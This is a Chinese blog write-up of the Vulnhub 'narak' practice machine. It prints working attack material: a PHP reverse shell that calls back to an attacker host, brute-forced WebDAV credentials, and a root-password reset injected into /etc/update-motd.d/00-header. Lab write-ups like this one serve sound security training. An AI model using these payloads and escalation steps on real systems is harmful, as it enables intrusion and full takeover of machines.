narak靶机详解

最新推荐文章于 2024-10-02 16:50:28 发布
最新推荐文章于 2024-10-02 16:50:28 发布
阅读量491 收藏 2
点赞数
分类专栏: 打靶机系列 文章标签: linux web安全 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44681307/article/details/131649152
版权

narak靶机复盘

首先对靶机进行扫描,找到靶机的真实ip地址。

然后dirb进行目录扫描,扫描到一个目录,我们打开发现是一个登陆界面。

image-20230628213107521

image-20230628213148152

并没有用户名和密码,我们就用cewl扫描这个网站,扫出一个字典,用来暴力破解。

cewl http://192.168.197.170 -w passwd1.txt

image-20230628202905535

经过暴力破解发现了一个用户名和密码

login: yamdoot password: Swarg

成功登陆webdav这个页面,在网上搜索了一下webdav,发现是一个客户端,发现有专门针对这个客户端上传文件的工具,所以我们就利用cadaver上传一个php木马文件。

Cadaver 是一个命令行 WebDAV 客户端工具,可以用来管理 WebDAV 服务器上的文件和目录。

创建一个shell.php在当前目录下,然后使用cadaver登陆webdav,使用put shell.php命令就能把我们的木马上传。

<?php
$ip='192.168.197.160';
$port='8888';
$sock = fsockopen($ip,$port);
$descriptorspec = array(
	0 => $sock, 
	1 => $sock, 
	2 => $sock
);
$process = proc_open('/bin/sh', $descriptorspec, $pipes);
proc_close($process);
?>

image-20230628204733683

原本登陆后是没有shell.php,现在我们上传后执行一个反弹shell,用kali来监听就可以返回一个命令行。

image-20230628205022968

image-20230628205008779

用python3美化一下命令行。

image-20230628205129325

经过寻找发现在/mnt目录下有一个hell.sh文件,打开后发现有一串brainfuck加密文本,经过解密发现明文是chitragupt

image-20230628205238020

image-20230628205427597

发现home下面有三个用户,就尝试用这个密码来登陆一下,发现刚好是inferno用户的密码,因为原本是web shell权限很低,现在拿到了真正的shell。

image-20230628205605050

find / -type f -user root -perm -ug=x,o=w -exec ls -l '{}' \; 2>/dev/null

#命令解释:
从根目录下开始查找 文件类型 属主是root 普通用户或组可执行 其他用户可写  如果发现了符合条件的用 ls -l命令显示  错误信息从定向到null

image-20230628214755879

motd是负责ssh登录后,页面欢迎语 提示语的,用户可以通过配置文件自定义欢迎提示信息。具体配置文件理论上这个目录下的任意文件都可以。通常修改00-header文件即可。

/etc/update-motd.d/00-header

echo “echo ‘root:admin’|sudo chpasswd”>>/etc/update-motd.d/00-header

image-20230628210109761

image-20230628212205368

虽说理论上修改这个文件夹的所有文件都可以,但是经过尝试了一个别的文件,并不能成功修改root密码,只有00-header在ssh连接时候会执行成功。

image-20230628212601630

dumplings。
关注
专栏目录
信息安全技术(一)——第4章使用主动扫描
2201_75757066的博客
06-17 309
通过本次实验,我认识到nmap是一款强大的网络扫描和主机扫描工具。nmap不仅仅可以收集信息和枚举,同时可以作为一个漏洞扫描探测器或安全扫描器。它适用于windows,linux,mac等操作系统。主动扫描一般都是针对目标发送特制的数据包,根据目标的反应来获得一些信息。这些信息主要包括目标主机是否在线,目标主机的指定端口是否开放,目标主机的操作系统,目标主机上运行的服务等等。
narak靶场实战详解
Askshhbs的博客
04-22 2104
网络安全web,Kali,渗透测试相关课件,工具,资料 可以关注公众号:“掌控安全课堂” 回复:“我想学黑客”即可免费获得 靶机:https://download.vulnhub.com/ha/narak.ova 注释:使用vmwarworkstation运行虚拟机 难度:中+ 目标:取得root权限+2Flag 网络配置:这里简单介绍下我的网络配置,靶机和Kali都用的VMware,然后使用nat连接,开启了dhcp。 0x00 环境配置 虚拟网络编辑器: Kali: 靶机
Narak靶机渗透
weixin_56306210的博客
01-31 526
Narak靶机渗透
narak靶场渗透测试
qq_41567985的博客
11-09 160
Nmap -sU ip 扫到一个udp的63 tftp协议,连接之后就可以拿到关键信息了,我觉得这样才是一个正确的打靶思路,纯粹的暴力破解虽然能行,但是感觉有点鲁莽了。向00-header中写入echo 'root:admin'|sudo chpasswd。tips.txt 提示我们通往narak的门的线索可以在creds.txt找到。webdav是一个服务,kali自带了一个webdav的漏洞利用工具。2023年11月8日 晚上19:00晚上20:30。这里涉及到一个知识点,这里是我查到的,叫做。
narak靶机
2303_79608809的博客
08-02 932
目前我们还没有找到关键的突破点,所以我们下一步需要从扫描目录的点着手。在本次实验中,需要对在不断尝试的过程的靶机的信息足够熟悉并进行一定的猜测,比如:要对creds.txt这个加密文件进行base64解密后得到的明文联想到这可能是/webdav的登录的账号和密码,否则后续的一切渗透流程都很难展开。我们在/home家目录下,看到三个用户,然后在/etc/passwd文件下,看到具有/bin/bash权限的用户,也刚好有这几个,很有可能这几个账户中就有和刚才chitragupt密码匹配ssh的用户。
Narak靶机打靶过程
qq_64703089的博客
08-03 879
Narak发布日期:23 Sep 2020tips1、目录扫描记得扫 txt、备份文件等2、爆破无果,可以自己通过页面单词整理一份字典3、端口扫描 TCP要是打不进去,看看UDP。
narak靶机打靶过程及思路
qq_52610024的博客
05-19 315
使用hydra进行爆破hydra-Ldict.txt-Pdict.txt10.1.8.133http-get/webdav-v后面的意思是使用http。继续查找文件find/-typef-userroot-perm-ug=x,o=w-execls-l‘{}’;上传反弹shell的php文件/usr/share/webshells/php/php-reverse-shell.php。使用CVE-2021-3493漏洞进行提权,提权成功拿下root账号。...
narak靶机总结
weixin_51692662的博客
11-06 697
webdav、narak靶机、motd提权
VulnHub-Narak靶机笔记
LINGX5的博客
09-21 1404
Narak是一台Vulnhub的靶机,其中有简单的tftp和webdav的利用,以及motd文件的一些知识。
靶机练习 narak ,个人学习心得
09-08
靶机练习 NARAK,个人学习心得 靶机练习 靶机练习是渗透测试的重要组成部分,它可以帮助我们检测系统中的安全漏洞和脆弱性。在这个练习中,我们使用的靶机NARAK,并且通过渗透测试来获取 Flag。 探测靶机 IP ...
Vulnhub:narak靶机练习教程
m0_74887243的博客
05-13 194
使用dirb扫描网页目录,发现了webdav的路径,访问需要用户名和密码。目标:找到两个flag:user.txt root.txt。靶机22端口开启ssh服务;80端口开启http服务。使用kali自带的字典生成工具,从网页上爬取信息。访问靶机ip查看网页源代码,没有太大帮助。将webshell上传到webdav。使用ssh的登陆inferno。攻击机和靶机都使用net模式。使用nmap扫描到靶机ip。找到上传路径,上传成功。
靶机narak
weixin_50339323的博客
08-04 1642
靶机网址:https://www.vulnhub.com/entry/ha-narak,569/ 目录 一、信息搜集: 二、漏洞利用与探测: 三、提权 一、信息搜集: 获取IP: nmap -sP 192.168.8.0/24 端口扫描: nmap -sV -p- -sC 192.168.8.132 -n -vv 22、80端口均开启 访问192.168.8.132 从页面搜索信息 · 翻译了一下网页内容信息提取关键字或许有用: yamdoot,...
VulnHub narak
weixin_45682839的博客
10-21 1210
涉及知识包括:主机存活探测、端口服务探测、WEB信息搜集、WEB爆破专用字典生成、暴力破解、webdav PUT上传、linux本地提权、Brainfuck加解密、motd文件注入提权等。
[Linux]从零开始的网站搭建教程
c858845275的博客
10-02 783
讲解了如何搭建运维面板安装web服务器和搭建一个自己的网站。
在 Kali Linux 中安装 Impacket
weixin_44023460的博客
09-30 240
在安装 Impacket 之前,你需要确保安装了 Python 和一些必要的依赖。通常,Kali 已经预装了 Python。步骤 3:克隆 Impacket 仓库。步骤 4:进入 Impacket 目录。如果你看到帮助信息,说明安装成功。步骤 5:安装 Impacket。
Linux 安装redis主从模式+哨兵模式3台节点
一千个读者就有一千个哈姆雷特
09-27 423
Linux 安装redis主从模式+哨兵模式3台节点
Linux】进程间关系与守护进程
最新发布
叫我龙翔的博客
10-02 488
超出能力之外的事,如果永远不去做,那你就永远无法进步。--- 乌龟大师 《功夫熊猫》---
linux 源代码编译
Lxn2zh的博客
09-27 1360
有时候会在linux上下载源码包,然后进行编译成可执行的文件,这个过程需要经过configure、make、make install、make clean四个步骤。configure 为这个程序在当前的操作系统环境下选择合适的编译器和环境参数来编译该代码。make install 将已编译好的可执行文件安装到操作系统指定或默认的安装目录下。make 对程序代码进行编译操作,会将源码编译成可执行的目标文件。make clean 删除编译时临时产生的目录或文件。
Linux——pod的调度
Xinan_____的博客
09-27 1064
CronJob 的名称必须是一个合法的 DNS 子域值, 但这会对 Pod 的主机名产生意外的结果。如果应用程序不需要任何稳定的标识符或有序的部署、删除或扩缩, 则应该使用由一组无状态的副本控制器提供的工作负载来部署应用程序,比如 Deployment 或者 ReplicaSet 可能更适用于你的无状态应用部署需要。尽管 StatefulSet 中的单个 Pod 仍可能出现故障, 但持久的 Pod 标识符使得将现有卷与替换已失败 Pod 的新 Pod 相匹配变得更加容易。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值